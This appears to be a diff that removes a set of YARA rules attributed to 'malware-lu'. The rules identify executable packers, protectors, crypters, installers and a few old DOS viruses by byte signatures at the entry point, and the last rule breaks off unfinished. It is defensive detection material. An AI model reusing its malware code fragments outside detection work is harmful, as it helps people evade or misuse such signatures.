-rule Upackv035alphaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B F2 8B CA 03 4C 19 1C 03 54 1A 20 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASPackv10801AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }
-	$a1 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 ?? BB 10 ?? 44 ?? 03 DD 2B 9D }
-	$a2 = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule ENIGMAProtectorV11SukhovVladimir
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ?? ?? 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEncrypt20junkcode
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 25 00 00 F7 BF 00 00 00 00 00 00 00 00 00 00 12 00 E8 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 00 00 E8 00 00 00 00 5D 81 ED 2C 10 40 00 8D B5 14 10 40 00 E8 33 00 00 00 89 85 10 10 40 00 BF 00 00 40 00 8B F7 03 7F 3C 8B 4F 54 51 56 8D 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimbiOZExtranger
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 50 60 E8 00 00 00 00 5D 81 ED 07 10 40 00 68 80 0B 00 00 8D 85 1F 10 40 00 50 E8 84 0B 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InnoSetupModulev304betav306v307
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 B8 53 56 57 33 C0 89 45 F0 89 45 BC 89 45 B8 E8 B3 70 FF FF E8 1A 85 FF FF E8 25 A7 FF FF E8 6C }
-
-condition:
-		$a0
-}
-	
-	
-rule ASPackv107bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PROPACKv208emphasisonpackedsizelocked
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC ?? 8B EC BE ?? ?? FC E8 ?? ?? 05 ?? ?? 8B C8 E8 ?? ?? 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HACKSTOPv110p1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 30 CD 21 86 E0 3D 00 03 73 ?? B4 2F CD 21 B4 2A CD 21 B4 2C CD 21 B0 FF B4 4C CD 21 50 B8 ?? ?? 58 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AdysGlue110
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E ?? ?? ?? ?? 0E 1F BF ?? ?? 33 DB 33 C0 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxEddiebased1745
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA ?? 8B E6 81 ?? ?? ?? FB ?? 3B ?? ?? ?? ?? ?? 50 06 ?? 56 1E 8B FE 33 C0 ?? 50 8E D8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASDPackv10asd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 56 53 E8 5C 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ?? ?? ?? 00 00 00 00 00 00 00 40 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 ?? 00 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5B 81 EB E6 1D 40 00 83 7D 0C 01 75 11 55 E8 4F 01 00 00 E8 6A 01 00 00 5D E8 2C 00 00 00 8B B3 1A 1E 40 00 03 B3 FA 1D 40 00 8B 76 0C AD 0B C0 74 0D FF 75 10 FF 75 0C FF 75 08 FF D0 EB EE B8 01 00 00 00 5B 5E C9 C2 0C 00 55 6A 00 FF 93 20 21 40 00 89 83 FA 1D 40 00 6A 40 68 00 10 00 00 FF B3 02 1E 40 00 6A 00 FF 93 2C 21 40 00 89 83 06 1E 40 00 8B 83 F2 1D 40 00 03 83 FA 1D 40 00 50 FF B3 06 1E 40 00 50 E8 6D 01 00 00 5F }
-
-condition:
-		$a0
-}
-	
-	
-rule ORiENV1XV2XFisunAV
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F 74 65 63 74 69 6F 6E 20 73 79 73 74 65 6D }
-
-condition:
-		$a0
-}
-	
-	
-rule StonesPEEncryptorv113
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 97 3B 40 ?? 2B 95 2D 3C 40 ?? 83 EA 0B 89 95 36 3C 40 ?? 01 95 24 3C 40 ?? 01 95 28 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv302v302aExtractable
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 33 C9 B1 ?? 51 06 06 BB ?? ?? 53 8C D3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ARMProtector03bySMoKE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 13 24 40 00 EB 02 83 09 8D B5 A4 24 40 00 EB 02 83 09 BA 4B 15 00 00 EB 01 00 8D 8D EF 39 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 }
-
-condition:
-		$a0
-}
-	
-	
-rule VxSlowload
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 D6 B4 40 CD 21 B8 02 42 33 D2 33 C9 CD 21 8B D6 B9 78 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiDote10BetaSISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 BB FF FF FF 84 C0 74 2F 68 04 01 00 00 68 C0 23 60 00 6A 00 FF 15 08 10 60 00 E8 40 FF FF FF 50 68 78 11 60 00 68 68 11 60 00 68 C0 23 60 00 E8 AB FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 66 8B 41 06 89 54 24 14 8D 68 FF 85 ED 7C 37 33 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DzAPatcherv13Loader
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF 00 40 40 00 99 68 48 20 40 00 68 00 20 40 00 52 52 52 52 52 52 52 57 E8 15 01 00 00 85 C0 75 1C 99 52 52 57 52 E8 CB 00 00 00 FF 35 4C 20 40 00 E8 D2 00 00 00 6A 00 E8 BF 00 00 00 99 68 58 20 40 00 52 52 68 63 10 40 00 52 52 E8 DB 00 00 00 6A FF FF 35 }
-
-condition:
-		$a0
-}
-	
-	
-rule CDSSS10beta1CyberDoom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 4E 40 00 E8 D7 03 00 00 0B C0 0F 84 A9 02 00 00 E8 F9 02 00 00 89 85 94 4E 40 00 8D 85 12 4D 40 00 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule y0dasCrypterv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED E7 1A 40 00 E8 A1 00 00 00 E8 D1 00 00 00 E8 85 01 00 00 F7 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule y0dasCrypterv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NullsoftPiMPInstallSystemv1x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 0C 53 56 57 FF 15 ?? ?? 40 00 05 E8 03 00 00 BE ?? ?? ?? 00 89 44 24 10 B3 20 FF 15 28 ?? 40 00 68 00 04 00 00 FF 15 ?? ?? 40 00 50 56 FF 15 ?? ?? 40 00 80 3D ?? ?? ?? 00 22 75 08 80 C3 02 BE ?? ?? ?? 00 8A 06 8B 3D ?? ?? 40 00 84 C0 74 ?? 3A C3 74 }
-
-condition:
-		$a0
-}
-	
-	
-rule ExeBundlev30smallloader
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 60 BE 00 F0 40 00 8D BE 00 20 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXAlternativestub
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EmbedPE113cyclotron
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 B8 5E 2D C6 DA FD 48 63 05 3C 71 B8 5E 97 7C 36 7E 32 7C 08 4F 06 51 64 10 A3 F1 4E CF 25 CB 80 D2 99 54 46 ED E1 D3 46 86 2D 10 68 93 83 5C 46 4D 43 9B 8C D6 7C BB 99 69 97 71 2A 2F A3 38 6B 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor2223protectedIAT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { CC ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? B4 ?? ?? ?? 08 ?? ?? ?? 00 00 00 00 FF FF FF FF E8 ?? ?? ?? 04 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 94 ?? ?? ?? A4 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01Armadillo300Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptorvxxxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Morphinev33SilentSoftwareSilentShieldc2005
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 }
-	$a1 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule DEF10bartxt
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv0971v0976
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 C3 9C 60 E8 5D 55 5B 81 ED 8B 85 01 85 66 C7 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCShrinkv040b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 BD ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 6A ?? FF ?? ?? ?? ?? ?? 50 50 2D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePECrypt102emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 05 50 E8 08 00 00 00 EA FF 58 EB 18 EB 01 0F EB 02 CD 20 EB 03 EA CD 20 58 58 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ORiENv211212FisunAlexander
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 5D 01 00 00 CE D1 CE ?? 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule StonesPEEncruptorv113
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv11MTEc
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 60 E8 1B ?? ?? ?? E9 FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CreateInstallStubvxx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 6A 00 FF 15 18 61 40 00 68 00 70 40 00 89 45 08 FF 15 14 61 40 00 85 C0 74 27 6A 00 A1 00 20 40 00 50 FF 15 3C 61 40 00 8B F0 6A 06 56 FF 15 38 61 40 00 6A 03 56 FF 15 38 61 40 00 E9 36 03 00 00 68 02 7F 00 00 33 F6 56 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WinZip32bitSFXv8xmodule
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 FF 15 ?? ?? ?? 00 B3 22 38 18 74 03 80 C3 FE 8A 48 01 40 33 D2 3A CA 74 0A 3A CB 74 06 8A 48 01 40 EB F2 38 10 74 01 40 ?? ?? ?? ?? FF 15 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upxv12MarcusLazlo
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEPACKv10byANAKiN1998
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 74 ?? E9 ?? ?? ?? ?? 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NeoLitev20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4E 65 6F 4C 69 74 65 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03fakeSpalsher1x3xFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 9C 60 8B 44 24 24 E8 00 00 00 00 5D 81 ED 00 00 00 00 50 E8 ED 02 00 00 8C C0 0F 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv10803AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }
-	$a1 = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E }
-	$a2 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD }
-	$a3 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point
-}
-	
-	
-rule VMProtect07x08PolyTech
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }
-
-condition:
-		$a0
-}
-	
-	
-rule ExeShieldProtectorV36wwwexeshieldcom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WerusCrypter10Kas
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 98 11 40 00 6A 00 E8 50 00 00 00 C9 C3 ED B3 FE FF FF 6A 00 E8 0C 00 00 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 A8 10 40 00 FF 25 B0 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB E8 12 40 00 80 33 05 E9 7D FF FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule Themida10xx1800compressedengineOreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }
-	$a1 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 5A ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule CHECKPRGc1992
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressor11CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? 12 00 00 E9 ?? 0C 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxEddie1028
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E FC 83 ?? ?? 81 ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E B8 FE 4B CD 21 81 FF BB 55 ?? ?? 07 ?? ?? ?? 07 B4 49 CD 21 BB FF FF B4 48 CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEQuakev006byfORGAT
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 A5 00 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 3D ?? 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? 00 00 5B ?? 00 00 6E ?? 00 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 }
-
-condition:
-		$a0
-}
-	
-	
-rule LTCv13
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv071b7
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 48 11 00 00 C3 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv071b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 44 11 00 00 C3 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UnknownJoinersignfrompinch260320070212
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 44 90 4C 90 B9 DE 00 00 00 BA 00 10 40 00 83 C2 03 44 90 4C B9 07 00 00 00 44 90 4C 33 C9 C7 05 08 30 40 00 00 00 00 00 90 68 00 01 00 00 68 21 30 40 00 6A 00 E8 C5 02 00 00 90 6A 00 68 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DIETv100v100d
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule APEX_CBLTApex40500mhz
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule StealthPEv11
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BA ?? ?? ?? 00 FF E2 BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 03 B8 ?? ?? ?? ?? 89 02 83 C2 FD FF E2 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117DLLAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 }
-
-condition:
